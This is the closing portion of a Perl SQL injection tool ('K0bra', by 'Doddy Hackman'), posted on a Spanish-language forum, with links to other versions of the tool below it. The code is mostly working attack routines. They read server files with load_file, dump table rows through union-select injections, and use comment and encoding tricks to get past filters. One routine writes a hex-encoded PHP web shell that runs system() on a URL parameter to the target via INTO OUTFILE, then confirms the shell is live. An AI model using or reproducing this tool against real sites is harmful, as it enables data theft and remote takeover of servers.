  518. savefile($_[3].".txt","[Column Found] : $columns");
  519. }
  520. }
  521. } else {
  522. print "\n[Example] : $0 http://127.0.0.1/tester/sql.php?id=-1+union+select+hackman,2,3 hackers\n\n"; &copyright;
  523. }
  524. }
  525.  
  526. sub load {
  527. savefile($_[2].".txt","\n");
  528. print "\n";
  529. ($pass1,$pass2) = &bypass($_[1]);
  530. if ($_[0] =~/(.*)hackman(.*)/g) {
  531. print "\n[+] Searching files with load_file...\n\n\n";
  532. my $start = $1; my $end = $2;
  533. for my $file(@files) {
  534. chomp $file;
  535. $concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".encode($file)."),char(107,48,98,114,97))))";
  536. my $code = toma($start.$concat.$end.$pass2);
  537. chomp $code;
  538. if ($code=~/k0bra(.*)k0bra/s) {
  539. print "[File Found] : $file\n";
  540. print "\n[Source Start]\n\n";
  541. print $1;
  542. print "\n\n[Source End]\n\n";
  543. savefile($_[2].".txt","[File Found] : $file");
  544. savefile($_[2].".txt","\n[Source Start]\n");
  545. savefile($_[2].".txt","$1");
  546. savefile($_[2].".txt","\n[Source End]\n");
  547. }}}}
  548.  
  549. sub loadfile {
  550. savefile($_[2].".txt","\n");
  551. ($pass1,$pass2) = &bypass($_[1]);
  552. if ($_[0] =~/(.*)hackman(.*)/g) {
  553. my $start = $1; my $end = $2;
  554. print "\n\n[+] File to read : ";
  555. chomp (my $file = <stdin>);
  556. $concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".encode($file)."),char(107,48,98,114,97))))";
  557. my $code = toma($start.$concat.$end.$pass2);
  558. chomp $code;
  559. if ($code=~/k0bra(.*)k0bra/s) {
  560. print "[File Found] : $file\n";
  561. print "\n[Source Start]\n\n";
  562. print $1;
  563. print "\n\n[Source End]\n\n";
  564. savefile($_[2].".txt","[File Found] : $file");
  565. savefile($_[2].".txt","\n[Source Start]\n");
  566. savefile($_[2].".txt","$1");
  567. savefile($_[2].".txt","\n[Source End]\n");
  568. }}}
  569.  
  570. sub dump {
  571. savefile($_[5].".txt","\n");
  572. print "\n";
  573. my $page = $_[0];
  574. ($pass1,$pass2) = &bypass($_[4]);
  575. if ($page=~/(.*)hackman(.*)/){ 
  576. my $start = $1;
  577. my $end = $2;
  578. print "[+] Extracting values...\n\n";
  579. $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
  580. $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
  581. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
  582. if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
  583. $tota = $1; 
  584. print "[+] Table : $_[3]\n";
  585. print "[+] Length of the rows : $tota\n\n";
  586. print "[$_[1]] [$_[2]]\n\n";
  587. savefile($_[5].".txt","[Table] : $_[3]");
  588. savefile($_[5].".txt","[+] Length of the rows: $tota\n");
  589. savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
  590. for my $limit(0..$tota) { 
  591. chomp $limit;
  592. $injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
  593. if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
  594. savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
  595. print "[$_[1]] : $1   [$_[2]] : $2\n"; 
  596. } else {
  597. print "\n\n[+] Extracting Finish\n"; 
  598. &reload;
  599. }
  600. }
  601. } else {
  602. print "[-] Not Found any DATA\n\n";
  603. }}}
  604.  
  605.  
  606. sub into {
  607. print "\n\n[Status] : Injecting a SQLI for create a shell\n\n";
  608. my ($page,$bypass,$dir,$save) = @_;
  609. savefile($save.".txt","\n");
  610. print "\n";
  611. ($pass1,$pass2) = &bypass($bypass);
  612. my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
  613. if ($path=~/\/(.*)$/) { 	
  614. my $path1 = $1;
  615. my $path2 = $path1;
  616. $path2 =~s/$1//;
  617. $dir =~s/$path1//ig;
  618. $shell = $dir."/"."shell.php";
  619. if ($page =~/(.*)hackman(.*)/ig) {
  620. my  ($start,$end) = ($1,$2);
  621. $code = toma($start."0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e".$end.$pass1."into".$pass1."outfile".$pass1."'".$shell."'".$pass2);
  622. $code1 = toma("http://".$auth."/".$path2."/"."shell.php");
  623. if ($code1=~/Mini Shell By Doddy/ig) {
  624. print "[shell up] : http://".$auth."/".$path2."/"."shell.php"."\a\a";
  625. savefile($save.".txt","[shell up] : http://".$auth."/".$path2."/"."shell.php");
  626. } else {
  627. print "[shell] : Not Found\n";
  628. }
  629. }
  630. }
  631. }
  632.  
  633. sub encode {
  634. my $string = $_[0];
  635. $hex = '0x';
  636. for (split //,$string) {
  637. $hex .= sprintf "%x", ord;
  638. }
  639. return $hex;
  640. }
  641.  
  642. sub decode {
  643. $_[0] =~ s/^0x//;
  644. $encode = join q[], map { chr hex } $_[0] =~ /../g;
  645. return $encode;
  646. }
  647.  
  648. sub bypass {
  649. if ($_[0] eq "/*") { return ("/**/","/**/"); }
  650. elsif ($_[0] eq "%20") { return ("%20","%00"); }
  651. else {return ("+","--");}}
  652.  
  653. sub ascii {
  654. return join ',',unpack "U*",$_[0]; 
  655. }
  656.  
  657. sub ascii_de {
  658. $_[0] = join q[], map { chr } split q[,],$_[0];
  659. return $_[0];
  660. }
  661.  
  662.  
  663. sub finish {
  664. &copyright;
  665. <STDIN>;
  666. exit(1);
  667. }
  668.  
  669. sub installer {
  670. unless (-d "/logs/webs") {
  671. mkdir("logs/",777);
  672. mkdir("logs/webs/",777);
  673. }
  674. }
  675.  
  676. sub copyright {
  677. print "\n\n\n\n(C) Doddy Hackman 2010\n\n";
  678. }
  679.  
  680. sub toma {
  681. return $nave->get($_[0])->content;
  682. }
  683.  
  684. sub savefile {
  685. open (SAVE,">>logs/webs/".$_[0]);
  686. print SAVE $_[1]."\n";
  687. close SAVE; 
  688. }
  689.  
  690. sub finish {
  691. print "\n\n\n(C) Doddy Hackman 2010\n\n";
  692. <STDIN>;
  693. exit(1);
  694. }
  695.  
  696.  
  697. # The End ? 
  698.  
« Última modificación: 1 Diciembre 2011, 22:18 pm por Doddy » En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Perl] K0bra 0.5
Scripting 		BigBear 0 2,624 Último mensaje 10 Octubre 2011, 16:53 pm
por BigBear
[Python] K0bra 0.3
Python 		BigBear 0 2,215 Último mensaje 3 Diciembre 2011, 16:35 pm
por BigBear
[Ruby] k0bra 0.3
Scripting 		BigBear 0 2,718 Último mensaje 16 Febrero 2012, 18:16 pm
por BigBear
[Perl] K0bra 1.6
Scripting 		BigBear 0 1,582 Último mensaje 14 Julio 2012, 19:38 pm
por BigBear
[Delphi] K0bra 1.0
Programación General 		BigBear 0 1,746 Último mensaje 26 Mayo 2013, 02:15 am
por BigBear
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines